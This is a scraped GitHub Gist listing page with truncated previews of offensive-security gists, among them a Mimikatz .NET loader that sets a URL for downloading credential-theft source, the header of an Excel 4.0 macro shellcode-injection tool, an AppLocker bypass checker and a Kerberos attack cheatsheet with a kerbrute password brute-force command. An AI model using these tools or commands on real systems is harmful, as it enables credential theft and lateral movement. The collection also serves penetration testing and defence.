| IDA Plugins | Preferred | Neutral | Unreviewed |
|---|
AA-2020743
0xhexmex
/ Get-KerberosKeytab.ps1
Created
February 14, 2019 21:50
— forked from raandree/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( | |
| [Parameter(Mandatory)] | |
| [string]$Path | |
| ) | |
| #Created by [email protected] | |
| # | |
| #Got keytab structure from http://www.ioplex.com/utilities/keytab.txt | |
| # | |
| # keytab { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # For untrusted XML input, use a hardened parser, see https://docs.python.org/3/library/xml.html | |
| import xml.etree.ElementTree as ET | |
| import sqlite3 | |
| import argparse | |
| import sys | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #### Mimikatz .Net v2 (2.0.0 Alpha) | |
| #### Many thanks to Casey Smith, Ridter, pljoel | |
| ########################################################### | |
| $url = "https://gist.githubusercontent.com/Ridter/041e7ca21de39e285e151893edff4bd9/raw/aa59a8691cdad53cda9013c015b8b1a94eb868db/katz.cs" | |
| $NetFolder = "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\" | |
| $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # AppLocker Bypass Checker (Default Rules) v2.0 | |
| # | |
| # One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed. | |
| # A normal user shouln't have write permission in that folder, but that is not always the case. | |
| # This script lists default ACL for the "BUILTIN\users" group looking for write/createFiles & execute authorizations | |
| # | |
| # @Author: Sparc Flow in "How to Hack a Fashion Brand" | |
| # | |
| # NOTE: change the group and root_folder variables to suit your needs |
neKuehn
/ Clean-DCshadow.ps1
Created
March 29, 2019 17:23
Removes the SPNs created when using the DC Shadow functionality of mimikatz
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -RunAsAdministrator | |
| #search for accounts that have the sync SPN that aren't a Domain Controller | |
| $shadowcomps = Get-ADObject -LDAPFilter '(&(ServicePrincipalName=E3514235-4B06-11D1-AB04-00C04FC2DCD2/*)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))' -Properties ServicePrincipalName | |
| foreach ($scomp in $shadowcomps){ | |
| $sSpns = $scomp.ServicePrincipalName | where {$_ -like "E3514235-4B06-11D1-AB04-00C04FC2DCD2/*"} | |
| foreach ($sSpn in $sSpns){ |
nullenc0de
/ content_discovery_nullenc0de.txt
Last active
April 2, 2025 06:37
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 |
Philts
/ Invoke-ExShellcode.ps1
Last active
November 28, 2024 18:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Lateral movement and shellcode injection via Excel 4.0 macros | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM | |
| #> | |
| function Invoke-ExShellcode | |
| { | |
| <# |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: